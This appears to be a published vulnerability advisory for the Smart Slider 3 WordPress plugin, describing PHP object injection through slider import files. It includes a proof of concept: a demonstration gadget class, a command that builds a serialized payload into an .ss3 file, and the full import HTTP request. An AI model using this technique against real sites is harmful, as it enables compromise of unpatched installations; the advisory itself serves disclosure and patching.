WordPress Plugin Vulnerabilities
Smart Slider 3 < 3.5.1.11 - PHP Object Injection
Description
The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site.
Proof of Concept
To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die("Arbitrary deserialization"); } } Create a fake slider: echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data And import the fake slider in the Smart Slider 3 dashboard. POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1 Host: example.com Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767 Content-Length: 1416 Cookie:[admin+] -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="nextend_nonce" e771567d65 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="slider[upload_or_local]" 0 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3" Content-Type: application/octet-stream [File data] -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="selectslider[local-import-file]" -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="slider[local-import-file]" -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="slider[delete]" 0 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="slider[restore]" 0 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="selectslider[image-mode]" clone -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name="slider[image-mode]" clone -----------------------------304866225113075420131015772767--
Affects Plugins
References
CVE
Classification
Type
OBJECT INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-10 (about 1 years ago)
Last Updated
2022-10-10 (about 1 years ago)